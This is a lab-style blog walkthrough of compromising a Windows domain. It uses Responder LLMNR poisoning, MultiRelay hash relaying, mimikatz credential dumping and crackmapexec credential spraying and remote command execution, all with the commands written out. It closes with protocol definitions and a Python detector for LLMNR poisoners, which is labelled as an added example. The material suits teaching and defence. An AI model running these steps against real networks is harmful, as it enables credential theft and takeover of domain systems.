For this post, we’re going to walk through a scenario using the following tools: responder, MultiRelay.py, mimikatz, and crackmapexec.
We are on the internal network of a Windows domain.
Users are Local Administrators on local workstations.
Domain Administrators have separate admin accounts from their normal accounts, but log in with their Domain Administrator account on the same workstation.
We have already scanned the network with Nmap and have found the live hosts.
SMB Signing is disabled on workstations.
WDigest is on.
LLMNR is enabled.
OS: Windows Server 2008
Services: Active Directory Directory Services, DNS
Logged On Users: kcharles (domain administrator)
OS: Windows 7
Services: Local workstation
Logged On Users: sleaf (domain user/local administrator), sleafadmin (domain administrator)
OS: Windows 7
Services: Local Workstation
Logged On users: jegghead (domain user/local administrator)
OS: Kali Linux
Services: This is our attack machine.
Logged On Users: me 😉
Setting up our attack machine:
Do the usual (e.g., apt-get update, apt-get upgrade).
Install crackmapexec: apt-get install crackmapexec
Let’s do this!
First, let’s set up responder. We’ll have to edit the responder settings to turn off HTTP and SMB. In Kali Linux, it can be found here:
/usr/share/responder and will be named
We can go ahead and turn responder on. We’ll be using the flags: -I and -rv.
You can see what interface you’re using by using ifconfig:
Alright, now let’s start up responder.

![](/img/Responder/responderstart.png)

If we wanted to check for machines on the subnet with SMB signing not enabled, we can use RunFinger.py, which is in the responder toolset. On Kali Linux, you can find it at:
/usr/share/responder/tools named RunFinger.py
And all you’d do is:
![](/img/Responder/runfinger.png)

Now, let’s set up MultiRelay.py. This is a tool in the responder toolset. You can find it in Kali Linux at:
/usr/share/responder/tools named MultiRelay.py
We’ll start MultiRelay by pointing it at a target (-t) and using all users (-u ALL).
![](/img/Responder/multirelaystart.png)

Remember that sleaf and sleafadmin are logged into this Windows 7 machine. Now, anyone who has used Responder knows that it can take a bit to get any good traffic. We’d be waiting for someone to try to access something we can poison, so for the purpose of this demo, we’re going to have jegghead navigate to a share that doesn’t exist.

![](/img/Responder/testshare.png)

You’ll see that responder picks up on this LLMNR request and poisons it.

![](/img/Responder/respondertestshare.png)

Now, we’ll see in our MultiRelay.py output that we’ve successfully poisoned the LLMNR request and relayed the hash of jegghead to 10.0.2.4, where she had local administrator. We now have LocalSystem privileges on 10.0.2.4.

![](/img/Responder/multirelayoutput.png)

From here, we can run commands built in to this Responder interactive shell. For this demo, we are going to run Mimikatz. We can do this within the shell by doing:

```
mimi sekurlsa::logonpasswords
```

Here we get sleaf’s password:

![](/img/Responder/sleaf.png)

And because sleaf used their admin account on the same machine, we get sleafadmin:

![](/img/Responder/sleafadmin.png)

Woot woot. Now, we have the credentials of a domain administrator! So, now we’ve used responder, multirelay, and mimikatz.

So why don’t we just use these credentials to remote desktop? We could, if available. We can do many things. We could use PowerShell sessions, wmic, and more, but for now we’ll use crackmapexec, since it runs in memory or through items that aren’t often audited or monitored.

crackmapexec can be used for many things, but we’ll focus on a few. Let’s spray our credentials to find who’s logged in where. We can do this by pointing crackmapexec at the subnet and passing the creds:
```
# List logged-on users on every host in the subnet
crackmapexec 10.0.2.0/24 -u 'sleafadmin' -p '[email protected]' --lusers
```
This is definitely useful if we know that the user we have compromised has local administrator on all local workstations. Let’s say sleaf was an admin that didn’t log in to her admin account on her local workstation. We could use jegghead’s account to spray around the subnet looking for an admin that did.
We could also spray mimikatz trying to get credentials. To show that all you need is local administrator on the machines, we’ll use jegghead’s account. A “(Pwn3d!)” next to a machine means that she’s local administrator on that machine.
![](/img/Responder/mimikatspray.png)

The reason you’re seeing “Waiting on x host(s)” is because the network is slow, but you’ll see jegghead was local administrator on the workstations but not the server.

Now, let’s look at some of the other features. With the -x switch, we can run commands directly on the machine we target. We’ll be targeting the server (10.0.2.15). We’ll be running a command to ping us (10.0.2.6). I’ll have Wireshark up to show the ICMP packets coming back to our attack machine.
```
# Run a single command (-x) on the server
crackmapexec 10.0.2.15 -u 'sleafadmin' -p '[email protected]' -x 'ping 10.0.2.6'
```
And here’s the Wireshark capture:
So, there we are. A few examples of the usage of crackmapexec.
So in this demo, we’ve used responder, runfinger, multirelay, mimikatz, and crackmapexec.
Why Things Work
Remember our scenario.
Let’s go over some definitions and some quick additional information.
LLMNR (Link-Local Multicast Name Resolution)
This is a protocol based on DNS. When trying to find a host, a Windows machine will check its host file then DNS and then LLMNR. LLMNR is limited in that it is not routable. This means only machines on the same subnet can use it. Responder essentially waits for a Windows machine to be like “Who’s X?” and Responder will be like “Oh, I’m X.” If successful, the victim will send their NTLM/NTLMv2 hashed credentials to the attacker.
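A defender can turn that behaviour into a detection: no legitimate host answers an LLMNR query for a name that doesn’t exist, so any response to a made-up canary name points at a poisoner. This is an added example, not part of the original post; the canary name, the 10.0.2.5 source address and the packets in SAMPLE are constructed, and it assumes you feed it UDP port 5355 payloads captured elsewhere.

```python
import socket
import struct

def read_name(buf, off):
    """Decode an uncompressed name, or step over a compression pointer."""
    labels = []
    while buf[off]:
        n = buf[off]
        if (n & 0xC0) == 0xC0:                 # pointer: 2 bytes, ends the name
            return None, off + 2
        labels.append(buf[off + 1:off + 1 + n].decode("ascii", "replace"))
        off += 1 + n
    return ".".join(labels), off + 1

def parse_response(pkt):
    """Return (queried name, [IPv4 answers]) for an LLMNR response, else None."""
    _id, flags, qd, an = struct.unpack_from("!HHHH", pkt, 0)
    qname, off = read_name(pkt, 12)
    if not flags & 0x8000 or qd != 1 or qname is None:   # not a usable response
        return None
    off, ips = off + 4, []                     # skip QTYPE and QCLASS
    for _ in range(an):
        off = read_name(pkt, off)[1]
        rtype, _cls, _ttl, rdlen = struct.unpack_from("!HHIH", pkt, off)
        if rtype == 1 and rdlen == 4:          # A record
            ips.append(socket.inet_ntoa(pkt[off + 10:off + 14]))
        off += 10 + rdlen
    return qname.lower(), ips

def find_poisoners(captured, canaries):
    """captured: [(source IP, UDP payload)]; any answer for a canary is spoofed."""
    hits = []
    for src, pkt in captured:
        try:
            parsed = parse_response(pkt)
        except (IndexError, struct.error, OSError):
            continue                           # malformed or truncated packet
        if parsed and parsed[0] in canaries:
            hits.append((src, *parsed))
    return hits

def sample_pkt(name, answer_ip=None):
    """Constructed LLMNR query, or a response when answer_ip is given."""
    q = bytes([len(name)]) + name.encode() + b"\0" + struct.pack("!HH", 1, 1)
    if answer_ip is None:
        return struct.pack("!HHHHHH", 0x1234, 0, 1, 0, 0, 0) + q
    rr = struct.pack("!HHHIH", 0xC00C, 1, 1, 30, 4) + socket.inet_aton(answer_ip)
    return struct.pack("!HHHHHH", 0x1234, 0x8000, 1, 1, 0, 0) + q + rr

SAMPLE = [("10.0.2.5", sample_pkt("zz-canary-7f3a")),            # constructed
          ("10.0.2.6", sample_pkt("zz-canary-7f3a", "10.0.2.6")),
          ("10.0.2.4", sample_pkt("fileserver", "10.0.2.15"))]
```

Calling `find_poisoners(SAMPLE, {"zz-canary-7f3a"})` flags only the host that answered the canary query; the query itself and the answer for a real name are ignored.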
SMB (Server Message Block)
This is an application layer network protocol. This protocol is mostly used for accessing shares and printers. It can run over TCP on port 445 or via NetBIOS UDP Port 137, 138 and TCP ports 137 and 139. It can also run over legacy protocols, but we won’t cover that.
This allows apps and computers on a LAN to communicate with network hardware and send data across the network.
NT LAN Manager v2 – This is a challenge-response authentication protocol.
WDigest
This is a protocol for sending cleartext credentials to HTTP and Simple Authentication Security Layer (SASL) applications.
crackmapexec
This is a post-exploitation tool that allows for connecting and authenticating to multiple hosts at the same time. Everything is either run in memory, uses WinAPI calls, or uses built-in Windows features.
mimikatz
This is a post-exploitation tool that’s known for extracting plaintext passwords, hashes, and Kerberos tickets from memory. “Mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets”
Responder
“A LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.”